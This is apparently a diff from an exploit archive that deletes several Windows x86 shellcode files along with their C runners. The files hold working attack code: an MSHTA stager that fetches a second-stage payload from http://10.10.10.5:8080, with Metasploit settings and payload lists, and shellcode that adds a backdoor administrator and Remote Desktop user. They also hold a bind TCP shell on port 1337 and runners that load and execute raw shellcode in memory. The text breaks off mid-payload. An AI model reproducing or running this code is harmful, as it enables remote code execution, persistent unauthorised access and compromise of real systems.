"\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44"
"\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59"
"\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff"
"\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91"
"\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0\xff\xff\xff\x49\x89\xc6\xeb\x0f\x48\x31\xd2\x48\x83\xec\x20"
"\x41\xff\xd6\x48\x83\xc4\x20\xc3\x48\xb8\xff\x4b\x55\x20\x2f\x61\x64\x64\x48\xc1\xe8\x08\x50\x48\xb8\x73\x65\x72\x73\x22"
"\x20\x42\x4f\x50\x48\xb8\x65\x73\x6b\x74\x6f\x70\x20\x55\x50\x48\xb8\x52\x65\x6d\x6f\x74\x65\x20\x44\x50\x48\xb8\x6c\x67"
"\x72\x6f\x75\x70\x20\x22\x50\x48\xb8\x6e\x65\x74\x20\x6c\x6f\x63\x61\x50\x48\xb8\x2f\x61\x64\x64\x20\x26\x26\x20\x50\x48"
"\xb8\x72\x73\x20\x42\x4f\x4b\x55\x20\x50\x48\xb8\x6e\x69\x73\x74\x72\x61\x74\x6f\x50\x48\xb8\x6f\x75\x70\x20\x41\x64\x6d"
"\x69\x50\x48\xb8\x20\x6c\x6f\x63\x61\x6c\x67\x72\x50\x48\xb8\x64\x20\x26\x26\x20\x6e\x65\x74\x50\x48\xb8\x4d\x30\x56\x33"
"\x20\x2f\x61\x64\x50\x48\xb8\x20\x53\x50\x33\x43\x31\x41\x4c\x50\x48\xb8\x73\x65\x72\x20\x42\x4f\x4b\x55\x50\x48\xb8\x2f"
"\x63\x20\x6e\x65\x74\x20\x75\x50\x48\xb8\x63\x6d\x64\x2e\x65\x78\x65\x20\x50\x48\x89\xe1\xe8\x2a\xff\xff\xff";
unsigned int payload_len = 387;
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
// If all good, run the payload
if (rv != 0) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}

185
shellcodes/windows_x86/49466.asm
View file

@ -1,185 +0,0 @@
# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 11-01-2021
# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses.
## Metasploit compatible payload list:
# generic/custom
# generic/debug_trap
# generic/shell_bind_tcp
# generic/shell_reverse_tcp
# generic/tight_loop
# windows/dllinject/bind_hidden_ipknock_tcp
# windows/dllinject/bind_hidden_tcp
# windows/dllinject/bind_ipv6_tcp
# windows/dllinject/bind_ipv6_tcp_uuid
# windows/dllinject/bind_named_pipe
# windows/dllinject/bind_nonx_tcp
# windows/dllinject/bind_tcp
# windows/dllinject/bind_tcp_rc4
# windows/dllinject/bind_tcp_uuid
# windows/dllinject/reverse_hop_http
# windows/dllinject/reverse_http
# windows/dllinject/reverse_http_proxy_pstore
# windows/dllinject/reverse_ipv6_tcp
# windows/dllinject/reverse_nonx_tcp
# windows/dllinject/reverse_ord_tcp
# windows/dllinject/reverse_tcp
# windows/dllinject/reverse_tcp_allports
# windows/dllinject/reverse_tcp_dns
# windows/dllinject/reverse_tcp_rc4
# windows/dllinject/reverse_tcp_rc4_dns
# windows/dllinject/reverse_tcp_uuid
# windows/dllinject/reverse_winhttp
# windows/dns_txt_query_exec
# windows/download_exec
# windows/exec
# windows/loadlibrary
# windows/messagebox
# windows/meterpreter/bind_hidden_ipknock_tcp
# windows/meterpreter/bind_hidden_tcp
# windows/meterpreter/bind_ipv6_tcp
# windows/meterpreter/bind_ipv6_tcp_uuid
# windows/meterpreter/bind_named_pipe
# windows/meterpreter/bind_nonx_tcp
# windows/meterpreter/bind_tcp
# windows/meterpreter/bind_tcp_rc4
# windows/meterpreter/bind_tcp_uuid
# windows/meterpreter/reverse_hop_http
# windows/meterpreter/reverse_http
# windows/meterpreter/reverse_http_proxy_pstore
# windows/meterpreter/reverse_https
# windows/meterpreter/reverse_https_proxy
# windows/meterpreter/reverse_ipv6_tcp
# windows/meterpreter/reverse_named_pipe
# windows/meterpreter/reverse_nonx_tcp
# windows/meterpreter/reverse_ord_tcp
# windows/meterpreter/reverse_tcp
# windows/meterpreter/reverse_tcp_allports
# windows/meterpreter/reverse_tcp_dns
# windows/meterpreter/reverse_tcp_rc4
# windows/meterpreter/reverse_tcp_rc4_dns
# windows/meterpreter/reverse_tcp_uuid
# windows/meterpreter/reverse_winhttp
# windows/meterpreter/reverse_winhttps
# windows/metsvc_bind_tcp
# windows/metsvc_reverse_tcp
# windows/patchupdllinject/bind_hidden_ipknock_tcp
# windows/patchupdllinject/bind_hidden_tcp
# windows/patchupdllinject/bind_ipv6_tcp
# windows/patchupdllinject/bind_ipv6_tcp_uuid
# windows/patchupdllinject/bind_named_pipe
# windows/patchupdllinject/bind_nonx_tcp
# windows/patchupdllinject/bind_tcp
# windows/patchupdllinject/bind_tcp_rc4
# windows/patchupdllinject/bind_tcp_uuid
# windows/patchupdllinject/reverse_ipv6_tcp
# windows/patchupdllinject/reverse_nonx_tcp
# windows/patchupdllinject/reverse_ord_tcp
# windows/patchupdllinject/reverse_tcp
# windows/patchupdllinject/reverse_tcp_allports
# windows/patchupdllinject/reverse_tcp_dns
# windows/patchupdllinject/reverse_tcp_rc4
# windows/patchupdllinject/reverse_tcp_rc4_dns
# windows/patchupdllinject/reverse_tcp_uuid
# windows/patchupmeterpreter/bind_hidden_ipknock_tcp
# windows/patchupmeterpreter/bind_hidden_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp_uuid
# windows/patchupmeterpreter/bind_named_pipe
# windows/patchupmeterpreter/bind_nonx_tcp
# windows/patchupmeterpreter/bind_tcp
# windows/patchupmeterpreter/bind_tcp_rc4
# windows/patchupmeterpreter/bind_tcp_uuid
# windows/patchupmeterpreter/reverse_ipv6_tcp
# windows/patchupmeterpreter/reverse_nonx_tcp
# windows/patchupmeterpreter/reverse_ord_tcp
# windows/patchupmeterpreter/reverse_tcp
# windows/patchupmeterpreter/reverse_tcp_allports
# "hta_server" exploit payloads setting example:
# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x75732082
# Function address of ExitProcess in kernel32.dll: 0x7578214f
# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit
# Assembly Shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov [edi+65], al ; size in bytes of message db parameter
StartUpInfoANDProcessInformation:
push eax ; hStderror null in this case
push eax ; hStdOutput, null
push eax ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12 ; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44 ; cb=0x44
lea eax, [esp+0x10] ; eax points to StartUpInfo
; eax has a pointer to StartUPinfo
; esp has a pointer to Process_Info containing null values
createprocessA:
push esp ; pointer to Process-Info
push eax ; pointer to StartUpInfo
xor ebx, ebx
push ebx ; null
push ebx ; null
push ebx ; null
inc ebx
push ebx ; bInheritHandles=true
dec ebx
push ebx ; null
push ebx ; null
push edi ; pointer to message db string
push ebx ; null
mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax ; createprocessA return in eax
mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"

84
shellcodes/windows_x86/49592.asm
View file

@ -1,84 +0,0 @@
# Exploit Title: Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 20-02-2021
#
# Tested on:
# Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
#
# Description:
# Windows x86 Shellcode that uses CreateProcessA Windows API to add a new user to administrators and remote desktop users group. This shellcode uses JMP/CALL/POP technique and static kernel32.dll functions addresses.
# It's possible to bypass bad-chars by switching the message db string between uppercase and lowercase letters.
#
# Shellcode considerations:
# Function address of CreateProcessA in kernel32.dll: 0x77082082
# Function address of ExitProcess in kernel32.dll: 0x770d214f
# Administartor user credentials: alfred:test
# Size of message db parameter, 152 bytes -> 0x98 hex =3D 0x111111A9 - 0x11111111 (0x00 badchar avoidance) ;)
#
# Assembly shellcode:
global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov esi, 0x111111A9
sub esi, 0x11111111
mov [edi+esi], al ; size of message db parameter
StartUpInfoANDProcessInformation:
push eax; hStderror null in this case
push eax; hStdOutput, null
push eax; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44; cb=3D0x44
lea eax, [esp+0x10]; eax points to StartUpInfo
; eax holds a pointer to StartUPinfo
; esp holds a pointer to Process_Info filled of null values
createprocessA:
push esp; pointer to Process-Info
push eax; pointer to StartUpInfo
xor ebx, ebx
push ebx; null
push ebx; null
push ebx; null
inc ebx
push ebx; bInheritHandles=3Dtrue
dec ebx
push ebx; null
push ebx; null
push edi; pointer to message db string
push ebx; null
mov edx, 0x77082082; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax; createprocessA return in eax
mov edx, 0x770d214f; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db 'c:\windows\system32\cmd.exe /c net user alfred test /add & net localgroup ADMINISTRATORS alfred /add & net localgroup "Remote Desktop Users" alfred /add'

187
shellcodes/windows_x86/50368.c
View file

@ -1,187 +0,0 @@
; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
; Description:
; This is a shellcode that pop a calc.exe. The shellcode iuses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table
; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec
; and exits gracefully using TerminateProcess.
; Author: h4pp1n3ss
; Date: Wed 09/22/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
start:
mov ebp, esp ; prologue
add esp, 0xfffff9f0 ; Add space int ESP to avoid clobbering
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
jne next_module ; No: try next module
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; POP the return address from the stack
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc:
call find_function_ret ; Relative CALL with negative offset
find_function:
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset to PE Signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddressOfNames VMA
mov [ebp-4], eax ; Save AddressOfNames VMA for later
find_function_loop:
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our names counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash:
xor eax, eax ; NULL EAX
cdq ; NULL EDX
cld ; Clear direction
compute_hash_again:
lodsb ; Load the next byte from esi into al
test al, al ; Check for NULL terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished:
popad ; Restore registers
ret ;
resolve_symbols_kernel32:
push 0xe8afe98 ; WinExec hash
call dword ptr [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save WinExec address for later usage
push 0x78b5b983 ; TerminateProcess hash
call dword ptr [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
create_calc_string:
xor eax, eax ; EAX = null
push eax ; Push null-terminated string
push dword 0x6578652e ;
push dword 0x636c6163 ;
push esp ; ESP = &(lpCmdLine)
pop ebx ; EBX save pointer to string
; UINT WinExec(
; LPCSTR lpCmdLine, -> EBX
; UINT uCmdShow -> EAX
; );
call_winexec:
xor eax, eax ; EAX = null
push eax ; uCmdShow
push ebx ; lpCmdLine
call dword ptr [ebp+0x10] ; Call WinExec
; BOOL TerminateProcess(
; HANDLE hProcess, -> 0xffffffff
; UINT uExitCode -> EAX
; );
terminate_process:
xor eax, eax ; EAX = null
push eax ; uExitCode
push 0xffffffff ; hProcess
call dword ptr [ebp+0x14] ; Call TerminateProcess
[!]===================================== POC ========================================= [!]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Our WinExec PopCalc shellcode
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e"
"\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43"
"\x3c\x8b\x7c\x03\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b\x45\xfc\x8b"
"\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75"
"\xdf\x8b\x57\x24\x01\xda\x66\x8b\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61"
"\xc3\x68\x98\xfe\x8a\x0e\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x14\x31\xc0"
"\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\x5b\x31\xc0\x50\x53\xff\x55\x10\x31\xc0\x50\x6a\xff"
"\xff\x55\x14";
unsigned int payload_len = 178;
int main(void) {
void * exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Allocate a memory buffer for payload
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy payload to new buffer
RtlMoveMemory(exec_mem, payload, payload_len);
// Make new buffer as executable
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
printf("\nHit me!\n");
printf("Shellcode Length: %d\n", strlen(payload));
getchar();
// If all good, run the payload
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
WaitForSingleObject(th, -1);
}
return 0;
}

324
shellcodes/windows_x86/50384.c
View file

@ -1,324 +0,0 @@
; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
; Author: h4pp1n3ss
; Date: Wed 10/06/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
; Description:
; This a bind tcp shellcode that open a listen socket on 0.0.0.0 and port 1337. In order to accomplish this task the shellcode uses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
start: ;
mov ebp, esp ;
add esp, 0xfffff9f0 ; Avoid null-bytes and stack clobbering
find_kernel32:
xor ecx, ecx ; ECX = Null
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module: ;
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next module)
cmp [edi+12*2], cx ; (unicode) module_name[12] == 0x00 / we found kernel32.dll?
jne next_module ; No: try next module
find_function_shorten: ;
jmp find_function_shorten_bnc ; short jump
find_function_ret: ;
pop esi ; ESI = POP return addres
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc: ;
call find_function_ret ; Call fund_function_ret PUSH ret address into the stack
find_function: ;
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset of PE signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddresOfNames VMA
mov [ebp-4], eax ; Save AddressOfName VMA for later usage
find_function_loop: ;
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash: ;
xor eax, eax ; EAX = Null
cdq ; Null EDX
cld ; Clear direction flag
compute_hash_again:
lodsb ; Load the next bytes from ESI into al
test al, al ; Check for Null terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished: ;
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished: ;
popad ; Restore registers
ret ;
resolve_symbols_kernel32: ;
push 0x78b5b983 ; TerminateProcess hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save TerminateProcess address for later usage
push 0xec0e4e8e ; LoadLibraryA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage
push 0x16b3fe72 ; CreateProcessA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x18], eax ; Save CreateProcessA address for later usage
load_ws2_32: ;
xor eax, eax ; EAX = Null
mov ax, 0x6c6c ; EAX = 0x6c6c
push eax ; ESP = "ll"
push dword 0x642e3233 ; ESP = "32.dll"
push dword 0x5f327377 ; ESP = "ws2_32.dll"
push esp ; ESP = &("ws2_32.dll")
call dword [ebp+0x14] ; Call LoadLibraryA
resolve_symbols_ws2_32:
mov ebx, eax ; Move the base address of ws2_32.dll to EBX
push 0x3bfcedcb ; WSAStartup hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x1C], eax ; Save WSAStartup address for later usage
push 0xadf509d9 ; WSASocketA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x20], eax ; Save WSASocketA address for later usage
push 0xc7701aa4 ; Bind hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x24], eax ; Save Bind address for later usage
push 0xe92eada4 ; listen hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x28], eax ; Save listen address for later usage
push 0x9f5b7976 ; WSAGetLastError hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x32], eax ; Save WSAGetLastError address for later usage
push 0x498649e5 ; accept hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x36], eax ; Save acccept address for later usage
call_wsastartup: ;
mov eax, esp ; Move ESP to EAX
mov cx, 0x590 ; Move 0x590 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpWSAData
xor eax, eax ; EAX = Null
mov ax, 0x0202 ; Move version to AX
push eax ; Push wVersionRequired (0x00000202)
call dword [ebp+0x1C] ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
call_wsasocketa: ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL )
xor eax, eax ; EAX = Null
push eax ; Push dwFlags
push eax ; Push g
push eax ; Push lpProtocolInfo
mov al, 0x06 ; Move AL, IPPROTO_TCP
push eax ; Push protocol
sub al, 0x05 ; Substract 0x05 from AL, AL = 0x01
push eax ; Push type
inc eax ; Increase EAX, EAX = 0x02
push eax ; Push af
call dword [ebp+0x20] ; Call WSASocketA(2,1,6,0,0,0)
create_sockaddr_in_struct: ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0}
mov esi, eax ; Move the SOCKET descriptor to ESI
xor eax, eax ; EAX = Null
push eax ; Push sin_addr (any address 0.0.0.0)
mov ax, 0x3905 ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905)
shl eax, 0x10 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000)
add ax, 0x02 ; Add 0x02 (AF_INET) to AX
push eax ; Push sin_port & sin_family
push esp ; Push pointer to the sockaddr_in structure
pop edi ; EDI = &(sockaddr_in)
call_bind: ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int namelen = 0x16)
xor eax, eax ; EAX = Null
add al, 0x16 ; Set AL to 0x16
push eax ; Push namelen
push edi ; Push *addr
push esi ; Push s
call dword [ebp+0x24] ; Call bind
call_wsagetlaserror: ; WSAGetLastError() (just for debugging purpouse)
call dword [ebp+0x32] ; Call WSAGetLastError
call_listen: ;
xor eax, eax ; EAX = Null
push eax ; Push backlog
push esi ; Push s
call dword [ebp+0x28] ; Call WS2_32!listen
call_accept: ; accept( SOCKET s, sockaddr *addr, int *addrlen)
xor eax, eax ; EAX = Null
push eax ; Push *addrlen (optional)
push eax ; Push *addr (optional)
push esi ; Push socket HANDLE from WSASocketA()
call dword [ebp+0x36] ; Call accept(SOCKET s ,Null, Null)
create_startupinfoa: ;
mov esi, eax ; Save Handle returned from accept() into ESI
push esi ; Push hStdError
push esi ; Push hStdOutput
push esi ; Push hStdInput
xor eax, eax ; EAX = Null
push eax ; Push lpReserved2
push eax ; Push cbReserved2 & wShowWindow
mov al, 0x80 ; Move 0x80 to AL
xor ecx, ecx ; EAX = Null
mov cl, 0x80 ; Move 0x80 to CL
add eax, ecx ; Set EAX to 0x100
push eax ; Push dwFlags
xor eax, eax ; EAX = Null
push eax ; Push dwFillAttribute
push eax ; Push dwYCountChars
push eax ; Push dwXCountChars
push eax ; Push dwYSize
push eax ; Push dwXSize
push eax ; Push dwY
push eax ; Push dwX
push eax ; Push lpTitle
push eax ; Push lpDesktop
push eax ; Push lpReserved
mov al, 0x44 ; Move 0x44 to AL
push eax ; Push cb
push esp ; Push pointer to the STARTUPINFOA structure
pop edi ; Store pointer to STARTUPINFOA in EDI
create_cmd_string: ;
mov eax, 0xff9a879b ; Move 0xff9a879b into EAX
neg eax ; Negate EAX, EAX = 00657865
push eax ; Push part of the "cmd.exe" string
push 0x2e646d63 ; Push the remainder of the "cmd.exe" string
push esp ; Push pointer to the "cmd.exe" string
pop ebx ; Store pointer to the "cmd.exe" string in EBX
call_createprocessa: ;
mov eax, esp ; Move ESP to EAX
xor ecx, ecx ; ECX = Null
mov cx, 0x390 ; Move 0x390 to CX
sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
push eax ; Push lpProcessInformation
push edi ; Push lpStartupInfo
xor eax, eax ; EAX = Null
push eax ; Push lpCurrentDirectory
push eax ; Push lpEnvironment
push eax ; Push dwCreationFlags
inc eax ; Increase EAX, EAX = 0x01 (TRUE)
push eax ; Push bInheritHandles
dec eax ; EAX = Null
push eax ; Push lpThreadAttributes
push eax ; Push lpProcessAttributes
push ebx ; Push lpCommandLine
push eax ; Push lpApplicationName
call dword [ebp+0x18] ; Call CreateProcessA
call_terminate_process: ;
xor eax, eax ; EAX = Null
push eax ; uExitCode
push 0xffffffff ; HANDLE hProcess
call dword [ebp+0x04] ; Call TerminateProcess
[*]================================= POC =============================== [*]
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// nasm -f win32 shellcode.asm -o shellcode.o
// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
"\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55"
"\x04\x89\x45\x14\x68\x72\xfe\xb3\x16\xff\x55\x04\x89\x45\x18\x31\xc0\x66"
"\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x55\x14"
"\x89\xc3\x68\xcb\xed\xfc\x3b\xff\x55\x04\x89\x45\x1c\x68\xd9\x09\xf5\xad"
"\xff\x55\x04\x89\x45\x20\x68\xa4\x1a\x70\xc7\xff\x55\x04\x89\x45\x24\x68"
"\xa4\xad\x2e\xe9\xff\x55\x04\x89\x45\x28\x68\x76\x79\x5b\x9f\xff\x55\x04"
"\x89\x45\x32\x68\xe5\x49\x86\x49\xff\x55\x04\x89\x45\x36\x89\xe0\x66\xb9"
"\x90\x05\x29\xc8\x50\x31\xc0\x66\xb8\x02\x02\x50\xff\x55\x1c\x31\xc0\x50"
